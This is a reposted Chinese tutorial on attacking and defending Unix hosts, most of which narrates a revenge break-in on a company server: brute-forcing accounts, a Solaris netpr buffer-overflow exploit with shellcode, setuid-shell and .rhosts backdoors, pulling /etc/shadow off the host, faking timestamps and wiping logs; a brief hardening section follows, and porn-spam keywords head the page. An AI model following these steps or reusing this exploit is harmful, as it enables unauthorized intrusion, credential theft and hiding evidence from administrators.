国产一级a片免费看高清,亚洲熟女中文字幕在线视频,黄三级高清在线播放,免费黄色视频在线看

打開APP
userphoto
未登錄

開通VIP,暢享免費(fèi)電子書等14項(xiàng)超值服

開通VIP
Unix系統(tǒng)的攻擊和防范 - Linux伊甸園----Linuxeden_com-Linu...
  §.前言

  這篇文章主要針對(duì)一些對(duì)網(wǎng)絡(luò)安全感興趣、同時(shí)又還不怎么熟悉Unix入侵和防范的朋友們而寫的一篇文章。本文循序漸進(jìn)地介紹了黑客攻擊Unix主機(jī)的主要方法和系統(tǒng)管理員如何針對(duì)這些方法進(jìn)行有效的防御等。
  §.Unix的特點(diǎn)

  Unix能流行起來絕對(duì)不是偶然的,這跟Unix本身的特點(diǎn)之突出是分不開的特點(diǎn),那就是:1、極強(qiáng)的可移植性;2、啟動(dòng)異步進(jìn)程的能力;3、一致的文件、設(shè)備和進(jìn)程間I/O;5、層次化的文件系統(tǒng);6、可用其它Shell來替代默認(rèn)Shell的能力; 7、真正的多用戶和多任務(wù)。

  列位注意,通常的Unix系統(tǒng)用戶有兩種:根用戶和普通用戶。

  1.root——根用戶

  這是SuperUser(超級(jí)用戶)的賬號(hào),可以用這個(gè)賬號(hào)對(duì)本系統(tǒng)進(jìn)行所有操作!獲得對(duì)系統(tǒng)的根訪問權(quán)限,也是黑客們拼命追求的終極目標(biāo)。

  2.普通用戶

  給User(普通用戶)使用,具體權(quán)限由root分配的賬戶。可以有多個(gè)等級(jí)。黑客們多由此類賬戶開始試圖進(jìn)入系統(tǒng),如下例就是如此。

  §.攻擊Unix系統(tǒng)的范例

  先補(bǔ)了一些關(guān)于Unix的知識(shí),下面我們要開始小試牛刀了。我們的攻擊平臺(tái)是一臺(tái)安裝了Redhat 6.0(內(nèi)核版本2.2.5-15)的工作站(當(dāng)然Win9x/Win2000上也可以試試啰!)。

  聲明:本文中的目標(biāo)主機(jī)的IP分別是202.202.0.8、202.103.10.110和211.50.33.117,以上IP純屬本人杜撰。如該IP所屬主機(jī)確實(shí)存在,則純屬巧合。

  開始啦!

  “又死機(jī)了!這是什么爛東西?可惡!”我憤怒地猛擊鍵盤“還號(hào)稱全智能化軟件……給您‘身臨其境的美妙體驗(yàn)’……,完全是放P!”我怒吼著。才買幾天的英語學(xué)習(xí)軟件就頻頻死機(jī),而且花去了不菲的xxx大元人民幣,使我有一種徹底受騙的感覺。“你這個(gè)騙子,我非要給你點(diǎn)厲害看看,看你還到處騙人!”我一邊憤憤地叫著,一邊抄下了包裝盒上那個(gè)“騙子”軟件公司的網(wǎng)址:www.shitsoft.com.cn 。當(dāng)夜無話。

  第二天。忙了一早上,直到中午吃完中餐后才閑下來,眾人皆昏昏然欲見周公,我則坐到我的紅帽子旁,開始了正義的懲罰……

  首先找一臺(tái)Proxy,這樣就不會(huì)被反查法給抓到了。^_^ 不知原來那臺(tái)韓國(guó)的“公雞”還在不在?試一試:

bash# telnet 211.50.33.117
Red Hat Linux release 6.2 (Goozer)
Kernel 2.2.14-5.0 on an i686
login:crossbow
password:
bash$

  Ok! 還可以用,這么長(zhǎng)時(shí)間沒有理它,竟然還可以用!韓國(guó)的管理員真是太“好”了!^_^ 接著ping一下我們的目標(biāo),看看它長(zhǎng)得啥模樣:

bash$ pwd
/home/crossbow
bash$ ping www.shitsoft.com.cn
Pinging www.shitsoft.com.cn [202.202.0.8] with 32 bytes of data:

Reply from 202.202.0.8: bytes=32 time<10ms TTL=245
Reply from 202.202.0.8: bytes=32 time<10ms TTL=245
Reply from 202.202.0.8: bytes=32 time<10ms TTL=245
Reply from 202.202.0.8: bytes=32 time<10ms TTL=245

Ping statistics for 202.202.0.8:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms


  速度不慢,看IP是中國(guó)教育網(wǎng)的機(jī)器,從TTL看估計(jì)是一臺(tái)Unix。驗(yàn)證一下:
bash$ telnet 202.202.0.8
SunOS 5.6
login:

  呵呵,是一臺(tái)SunOS 5.6的爛機(jī)器。先猜猜看:

login:adm
password:
Login incorrect

login:oracle
password:
Login incorrect

login:ftp
password:
Login incorrect

^C

  可惡!今天火氣真差!一個(gè)沒猜到。:-( 用messala掃描一下看有沒有CGI漏洞:(略去復(fù)雜的掃描過程)………… 結(jié)果是滴水不漏!:-( 這個(gè)鳥管理員還挺勤快的…… 只好用nss看看它開了什么服務(wù)吧!…………還好,telnet、ftp和finger的端口都打開了!^_^ 先看看有沒有匿名ftp賬戶:

bash$ ftp 202.202.0.8
Connected to 202.202.0.8...
220 Cool FTP server(Version xxx Tue Dec 8 12:42:10 CDT 2001) ready.
Name(202.202.0.8:FakeName):anonymous
331 Guest login ok,send you complete e-mail address as password.
Password:
230:Welcome,archive user!
…………
…………
…………
ftp>

  還行,匿名ftp服務(wù)沒有關(guān),竟然可以用anonymous賬戶進(jìn)來了!趕緊抓他的passwd:

ftp>ls
…………
bin boot etc dev home lib usr proc lost+found root sbin src tmp usr var
…………
ftp>cd /etc
…………
ftp>ls *passwd*
…………
passwd passwd-
…………

  不會(huì)如此簡(jiǎn)單吧?看一看?:

ftp>cat passwd|more
…………
root:x:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
telnet:x:71:8:Line Printer Admin:/usr/spool/lp:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
ftp:60001:60001:Ftp:/:
noaccess:x:60002:60002:No Access User:/:
nobody:x:65534:65534:SunOS 4.x Nobody:/:
dennis:x:1005:20::/export/home/dennis:/bin/sh
walter:x:1001:100::/export/home/walter:/bin/sh
power:x:9589:101::/export/home/power:/bin/sh
deal:x:1035:20::/export/home/deal:/bin/sh
jessica:x:3000:300:Agent Client 1:/export/home/jessica:/bin/sh
smith:x:3001:300:Agent Client 2:/export/home/smith:/bin/sh
render:x:9591:101::/export/home/render:/bin/sh

…………

  倒霉,是個(gè)空的passwd!看看備份:

ftp>cat passwd-|more
…………
root:x:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
telnet:x:71:8:Line Printer Admin:/usr/spool/lp:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
ftp:60001:60001:Ftp:/:
noaccess:x:60002:60002:No Access User:/:
nobody :x:65534:65534:SunOS 4.x Nobody:/:
dennis:x:1005:20::/export/home/dennis:/bin/sh
walter:x:1001:100::/export/home/walter:/bin/sh
power:x:9589:101::/export/home/power:/bin/sh
deal:x:1035:20::/export/home/deal:/bin/sh
jessica:x:3000:300:Agent Client 1:/export/home/jessica:/bin/sh
smith:x:3001:300:Agent Client 2:/export/home/smith:/bin/sh
render:x:9591:101::/export/home/render:/bin/sh

…………



  沒救了,一樣的!查查看有沒有shadow文件:
ftp>ls *shadow*
…………
shadow shadow-
…………

  哈哈,一般passwd是空的,那么密碼就在shadow中!

ftp>cat shadow|more
…………
[sh$ cat shadow|more]: Permission denied
…………

  可惡,看都不讓看,試試備份文件:

ftp>cat shadow-|more
…………
[sh$ cat shadow-|more]: Permission denied
…………

  都一樣——不讓看!Faint! 只好可憐惜惜地把空passwd抓回來——有幾個(gè)用戶名總比沒有強(qiáng)吧?

ftp>get passwd
226 Transfer complete.
540 bytes received in 0.55 seconds (1.8Kbytes/s)
ftp>bye
221 Goodbye.
bash$

  研究一下,除去root和被關(guān)掉的賬號(hào),還有七個(gè)可用賬號(hào):dennis、walter、power、deal、jessica、smith和render,他們就是我們進(jìn)入該主機(jī)最后的希望。^_^ finger上場(chǎng)!

bash$ finger @202.202.0.8
[202.202.0.8 ]
Login  Name      TTY Idle When Where
daemon  ???               < . . . . >
bin    ???               < . . . . >
sys    ???               < . . . . >
walter  Walter Wan   pts/0      202.202.0.114
dennis  Dennis Lee   437       888wnet.net
power   Power Xiong   0       202.202.0.10
deal   H Wang     pts/2      202.202.0.11
admin   ???              < . . . . >
jessica Jessica Xiao  pts/0      202.202.0.9
smith  Smith Liu    pts/0      202.202.0.13
render  Render     pts/0      202.103.10.117
ftp    ???              < . . . . >

  好!我需要的Name出來了,趕快保存:

bash$ finger @202.202.0.8 >> /home/crossbow/name.lst
bash$ more /home/crossbow/name.lst
[202.202.0.8 ]
Login   Name    TTY  Idle When Where
daemon   ???              < . . . . >
bin    ???              < . . . . >
sys    ???              < . . . . >
walter  Walter Wan  pts/0        202.202.0.114
dennis  Dennis Lee   437        888wnet.net
power  Power Xiong  0         202.202.0.10
deal   H Wang    pts/2       202.202.0.11
admin   ???     pts/0       < . . . . >
jessica  Jessica Xiao   pts/0       202.202.0.9
smith   Smith Liu    pts/0       202.202.0.13
render  Render Chen   0        202.103.10.117
ftp    ???              < . . . . >


  由于很多人都用自己的姓名及變體作密碼,我們就用他們的用戶名、姓、和數(shù)字的各種組合試一試,成功率應(yīng)該不低。這里我用一個(gè)我自己用C寫的程序——got!來跑吧。got!它自己會(huì)用用戶的姓、名和0-9數(shù)字的各種組合來嘗試模擬telnet登陸,省時(shí)省力。^_^ 不過這種暴力破解法會(huì)在目標(biāo)機(jī)的日志上留下痕跡。:-( 因此后面進(jìn)去后一定記得把日志“加工”一下。它的用法是:got! -n 用戶的姓 目標(biāo)機(jī)器 用戶名,你也可以用-f來指定字典文件暴力窮舉。
bash$ got! -n wan 202.202.0.8 walter
Attempting...

  N分鐘以后…………

Failed!
bash$

  見鬼!失敗了一個(gè),再試下一個(gè):

bash$ got! -n lee 202.202.0.8 dennis
Attempting...
Failed!
bash$

  再次失敗,已經(jīng)浪費(fèi)了不少時(shí)間了!:-(“失敗是成功之母”,不要灰心,接著來:

bash$ got! -n xiong 202.202.0.8 Power
Attempting...
Bingo!!!
The password of user ‘power‘ is ‘xiong99‘! Good luck!
bash$

  哈哈,得手了!終于搞到一個(gè)賬戶了——用戶名:power;密碼:xiong99。趕快用telnet吧!

bash$ telnet 202.202.0.8
SunOS 5.6
login:power
password:
Last login: Sun Dec 2 13:21:55 CDT 2001 from 202.202.0.10
Sun Microsystems Inc. SunOS 5.6
You have mail.

  進(jìn)來了!這個(gè)用戶不久前還登陸過嘛!不過千萬不要看mail,先看看現(xiàn)在有幾個(gè)人:

$ w
13:07pm up 61 day(s), 3 users, …………
User tty login@ idle JCPU PCPU what

root pts/0 11:49am tail -f syslog
smith pts/5 12:13pmls -l *.c
power pts/7 13:07pm w

  乖乖,管理員正在檢查日志!可得小心點(diǎn)!看看這臺(tái)Sun的版本細(xì)節(jié):

$ uname -a
SunOS dev01 5.6 Generic_105181-19 sun4u sparc SUNW,Ultra-5_10

  在看看這個(gè)用戶的環(huán)境設(shè)置:

$ set
HOME=/export/home/power
HZ=100
IFS=
LOGNAME=power
MAIL=/var/mail/power
MAILCHECK=600
OPTIND=1
PATH=/usr/bin:
PS1=$
PS2=>
SHELL=/bin/sh
TERM=ansi
TZ=China

  再看看有沒有g(shù)cc,沒有這玩藝,那就……@#$%^&*!

$ gcc
gcc: No input files.

  不錯(cuò),編譯器還“健在”,沒被刪掉?,F(xiàn)在,我們就開始溢出吧!^_^
$ cd
$ pwd
$ /export/home/power
$ mkdir ...
$ cd ...
$ vi ./.of.c

file://Here is the C source code for overflow in SunOS.
#include
#include
#include
#include
#include

#define NOPNUM 4000
#define ADRNUM 1200
#define ALLIGN 3

char shellcode[]=
"\x20\xbf\xff\xff" /* bn,a */
"\x20\xbf\xff\xff" /* bn,a */
"\x7f\xff\xff\xff" /* call */
"\x90\x03\xe0\x20" /* add %o7,32,%o0 */
"\x92\x02\x20\x10" /* add %o0,16,%o1 */
"\xc0\x22\x20\x08" /* st %g0,[%o0+8] */
"\xd0\x22\x20\x10" /* st %o0,[%o0+16] */
"\xc0\x22\x20\x14" /* st %g0,[%o0+20] */
"\x82\x10\x20\x0b" /* mov 0xb,%g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"/bin/ksh";

char jump[]=
"\x81\xc3\xe0\x08" /* jmp %o7+8 */
"\x90\x10\x00\x0e"; /* mov %sp,%o0 */

static char nop[]="\x80\x1c\x40\x11";
main(int argc,char **argv)
{
char buffer[10000],adr[4],*b,*envp[2];
int i;
printf("copyright LAST STAGE OF DELIRIUM dec 1999 poland file://lsd-pl.net/\n");
printf("/usr/lib/lp/bin/netpr solaris 2.7 sparc\n\n");
if(argc==1)
{
printf("usage: %s lpserver\n",argv[0]);
exit(-1);
}
*((unsigned long*)adr)=(*(unsigned long(*)())jump)()+7124+2000;
envp[0]=&buffer[0];
envp[1]=0;
b=&buffer[0];
sprintf(b,"xxx=");
b+=4;
for(i=0;i<1+4-((strlen(argv[1])%4));i++) *b++=0xff;
for(i=0;i<1+4-((strlen(argv[1])%4));i++) *b=0;
b=&buffer[5000];
for(i=0;i<1+4-((strlen(argv[1])%4));i++) *b=0;
execle("/usr/lib/lp/bin/netpr","lsd","-I","bzz-z","-U","x!x","-d",argv[1],
"-p",&buffer[5000],"/bin/sh",0,envp);
}

  上面我們建立一個(gè)隱藏目錄“...”,再建立一個(gè)隱藏的源代碼文件“.of.c”。接著輸入一大串代碼,最后按:wq保存并退出vi。我們看看源代碼是否生成了:

$ ls -al

total 1330
drw-rw-rw- 7 power user 1999 Jul 4 19:07 .
drw-r--r-- 35 root root 1999 Jun 29 16:52 ..
-rw-rw-r-- 1 power user 2001 Dec 8 13:15 .of.c

  Ok! 現(xiàn)在編譯鏈接吧!^_^

$ gcc -o .of .of.c
.of.c:17: malformed floating constant
.of.c:18: malformed floating constant
.of.c:23: nondigits in number and not hexadecimal
…………
…………
gcc:[$ Error 2 $]
$


 ?????怎么出錯(cuò)了?!估計(jì)是有地方敲錯(cuò)了。只好先用gdb調(diào)試,再用vi來修改了,真麻煩?。匀フ{(diào)試過程)…………終于改完了,編譯試一試:
$ gcc -o .of .of.c
$

  幸好沒出錯(cuò)。Run一下啰…………別慌!看看root還在不在:

$ w
13:31pm up 61 day(s), 1 user, …………
User tty login@ idle JCPU PCPU what

power pts/7 13:07pm w

  就我一個(gè)人了?估計(jì)忙了一早上,他們肯定餓壞了,都去吃飯去了吧!^_^

$ ./.of
usage: ./.of lpserver
$ ./of localhost
#

  哈哈!成功了!看見提示符變成“#”沒有?這就是root的特權(quán)標(biāo)志!

# whoami
root
#

  沒錯(cuò)了!哈哈!開始我們的“工作”吧:^_^

# rm -fr ./.of.c
# mkdir /usr/man/man1/...
# cp /bin/ksh /usr/man/man1/.../.zsh
# chmod +s /usr/man/man1/.../.zsh

  首先刪掉了源代碼文件,然后在/usr/man/man1/下建立一個(gè)隱藏目錄“...”,把ksh這個(gè)shell拷過去隱藏起來,并把屬性改成-rwsr-sr--。這是個(gè)簡(jiǎn)單的后門,下次我一進(jìn)來執(zhí)行它就可以root了,省時(shí)省力。^_^

# cd ..
# cd ..
# pwd
/export/home
# ls
dennis walter power deal jessica smith render
# cd render
# echo ‘++‘ >./.rhosts
# ls -l
………… .rhosts …………
#

  好,又在render的home里建了一個(gè)可以遠(yuǎn)程登陸的后門。下面把這臺(tái)主機(jī)的shadow傳回去,以后可以用John多跑一些密碼出來:^_^

# cp /etc/shadow /export/home/power/.../.s
# chmod 666 /export/home/power/.../.s
# exit
$ exit
bash$
bash$ ftp 202.202.0.8
Connected to 202.202.0.8...
220 Cool FTP server(Version xxx Tue Dec 8 12:42:10 CDT 2001) ready.
Name(202.202.0.8:FakeName):power
331 Guest login ok,send you complete e-mail address as password.
Password:
230:Welcome,power!
…………
…………
…………
ftp>ls
ftp>cd ...
ftp>ls -l
…………
.zsh .s
…………
ftp>get .s
226 Transfer complete.
540 bytes received in 0.55 seconds (1.8Kbytes/s)
ftp>bye
221 Goodbye.
bash$

  順利地get回來了。再次登陸之:

bash$ telnet 202.202.0.8
SunOS 5.6
login:power
password:
Last login: Mon Dec 8 13:21:15 CDT 2001 from 211.50.33.117
Sun Microsystems Inc. SunOS 5.6
$ /usr/man/man1/.../.zsh
# whoami
root
#

  利用剛才作的后門,輕松得到root。別忘了用touch給每個(gè)你動(dòng)過的文件改時(shí)間,以免被管理員發(fā)現(xiàn)文件被動(dòng)過!BTW:touch的用法是:touch -t 200112081314 目標(biāo)文件。然后我們用power的身份telnet一下自己,免得被power下次登陸一下就發(fā)現(xiàn)IP有問題:
# telnet localhost
Trying 127.0.0.1...
Connected to localhost.
Escape character is ‘^]‘.
SunOS 5.6
login: power
Password:
Last login: Mon Dec 8 13:21:55 CDT 2001 from 202.202.0.8
Sun Microsystems Inc. SunOS 5.6 Generic August 1997
You have mail.
$ exit
Connection closed by foreign host.
#

  下面我們要“擦腳印”了,一般需要我們擦的日志有如下幾個(gè): lastlog、utmp(utmpx)、wtmp(wtmpx)、messages、syslog和sulog。你可以用vi手動(dòng)刪除,不過我“好心”告訴你,手動(dòng)一條條地刪太麻煩,這里我們使用一個(gè)perl寫的腳本cleaner.sh,它可以幫我們把PP擦得干干凈凈 ^_^(這里略去如何將cleaner.sh用ftp傳上來,并隱藏起來的步驟):

chmod +x ./cleaner.sh
#./cleaner.sh power
Log cleaner v0.5b By: Tragedy/Dor OS
detection....
Detected SunOS
Log cleaning in process....
* Cleaning aculog ( 0 lines)...0 lines removed!
* Cleaning lastlog ( 19789 lines)...45 lines removed!
* Cleaning messages ( 12 lines)...1 lines removed!
* Cleaning messages.0 ( 12 lines)...0 lines removed!
* Cleaning messages.1 ( 28 lines)...0 lines removed!
* Cleaning messages.2 ( 38 lines)...0 lines removed!
* Cleaning messages.3 ( 17 lines)...0 lines removed!
* Cleaning spellhist ( 0 lines)...0 lines removed!
* Cleaning sulog ( 986 lines)...6 lines removed!
* Cleaning utmp ( 179 lines)...1 lines removed!
* Cleaning utmpx ( 387 lines)...1 lines removed!
* Cleaning vold.log ( 0 lines)...0 lines removed!
* Cleaning wtmp ( 299 lines)...0 lines removed!
* Cleaning wtmpx ( 565 lines)...0 lines removed!
* Cleaning authlog ( 0 lines)...0 lines removed!
* Cleaning syslog ( 53 lines)...0 lines removed!
* Cleaning syslog.0 ( 14 lines)...0 lines removed!
* Cleaning syslog.1 ( 64 lines)...0 lines removed!
* Cleaning syslog.2 ( 39 lines)...0 lines removed!
* Cleaning syslog.3 ( 5 lines)...0 lines removed!
* Cleaning syslog.4 ( 3 lines)...0 lines removed!
* Cleaning syslog.5 ( 210 lines)...0 lines removed!
# ./cleaner.sh root
…………

  擦干凈后再如法對(duì)root賬戶炮制一遍。最后……看了一下手表,哇!13:53了,又要上工了,:-( 以后再來消遣你吧!^_^ 現(xiàn)在,我要上工,你就好好休息啰!嘿嘿!

# /sbin/shutdown now
…………

  關(guān)機(jī)啦!Wow!

  §.討論及防范措施

  好了!我們從上面的例子可以看出,黑客的攻擊步驟是如下六個(gè)步驟:

  1.收集資料
  2.取得普通用戶的權(quán)限
  3.遠(yuǎn)程登陸
  4.取得超級(jí)用戶的權(quán)限
  5.留下后門
  6.清除日志



  其中最重要,也是最容易被管理員忽視的是第二個(gè)步驟。如果能夠得到一個(gè)那怕是權(quán)限再小的賬戶,黑客也可以利用各種五花八門的漏洞來提升他的權(quán)限,并最終獲得root。許多人認(rèn)為只要對(duì)root賬戶加以注意就足夠了,其實(shí)不然,如果黑客很容易地進(jìn)入了主機(jī),那他就會(huì)跳過root口令這一攻擊難點(diǎn),直接利用緩沖區(qū)溢出來root(如上面的例子就是這樣)。因此,大家一定要注意對(duì)普通賬戶密碼強(qiáng)度的測(cè)試和檢查,并強(qiáng)令用戶定期更改。

  定期遍歷磁盤檢查.rhosts文件,這個(gè)后門十分危險(xiǎn),它可以直接不用口令而遠(yuǎn)程登陸。況且現(xiàn)在有不少的工具可以自動(dòng)掃描這個(gè)漏洞,一旦發(fā)現(xiàn)一個(gè),黑客們就會(huì)像蒼蠅聞到血味一樣蜂擁而至。如果他們像我一樣的“善良”,只玩?zhèn)€shutdown還好說;碰到個(gè)把“辣手”黑客來個(gè)rm -fr *,你的飯碗估計(jì)就會(huì)丟了!

  定期檢查屬性為-rwsr-sr--的文件。這種文件只要一被user執(zhí)行,他馬上就會(huì)具有和該文件創(chuàng)造者一樣的權(quán)限。如果創(chuàng)造者是root的話,結(jié)果可想而之。一般黑客們都將shell改成此類屬性然后藏起來,便于下次利用。

  不要過分相信日志,因?yàn)樗芸赡苁潜蝗肭终呒舆^“工”的。注意留心某些啟動(dòng)時(shí)自動(dòng)加載的文件的內(nèi)容和時(shí)間,因?yàn)樗鼈兛赡軙?huì)被植入木馬。如:/etc/rc.d/init.d/network,就是在網(wǎng)絡(luò)服務(wù)啟動(dòng)時(shí)自動(dòng)加載的。

  使用MD5保護(hù)自己的二進(jìn)制程序。MD5在發(fā)現(xiàn)/bin、/sbin等目錄下的文件被替換時(shí)會(huì)報(bào)警或用Email通知管理員,這可以有效地防止假login、假su的誘騙。

  使用getsniff和rootkit detector等工具查找系統(tǒng)中是否有嗅探器和rootkit黑客工具包,尤其是rootkit,這玩藝危害無窮。

  留心自己的CGI是否有漏洞,現(xiàn)在針對(duì)CGI漏洞的掃描工具特別多:如Unix/Linux平臺(tái)下的messala和hunt等;Win9x/Win2000平臺(tái)下的Twwwsacn和流光等等。尤其是流光,不論高手還是菜鳥都喜歡用它,真是一副老少皆宜的奇怪景觀。^_^

  如果不需要ftp服務(wù),最好關(guān)掉它,開著只會(huì)后患無窮。黑客可以先將rootkit、特制的su,已修改過屬性的shell放在他自己的ftp服務(wù)器上,得到普通賬戶后直接上傳到你的機(jī)器上并執(zhí)行之,他就root了。簡(jiǎn)單吧?

  最后,你要經(jīng)常了解是否又有新漏洞出現(xiàn)了,要搶在黑客前面補(bǔ)上它(老生常談了 ^_^)。這里推薦一個(gè)我經(jīng)常逛的安全站點(diǎn)——綠盟科技:http://www.nsfocus.com

  本人才疏藝淺,如有錯(cuò)誤之處,還望各路高手不吝賜教crossbow@8848.net
本站僅提供存儲(chǔ)服務(wù),所有內(nèi)容均由用戶發(fā)布,如發(fā)現(xiàn)有害或侵權(quán)內(nèi)容,請(qǐng)點(diǎn)擊舉報(bào)。
打開APP,閱讀全文并永久保存 查看更多類似文章
猜你喜歡
類似文章
Linux中默認(rèn)的shell如何切換為其他類型的shell
bash 漏洞解析
Bash shell 字符串操作符詳解
OSCP靶場(chǎng)保姆級(jí)系列-Esay-Amaterasu
系統(tǒng)管理中 bash shell 腳本常用方法總結(jié)
linux環(huán)境變量
更多類似文章 >>
生活服務(wù)
分享 收藏 導(dǎo)長(zhǎng)圖 關(guān)注 下載文章
綁定賬號(hào)成功
后續(xù)可登錄賬號(hào)暢享VIP特權(quán)!
如果VIP功能使用有故障,
可點(diǎn)擊這里聯(lián)系客服!

聯(lián)系客服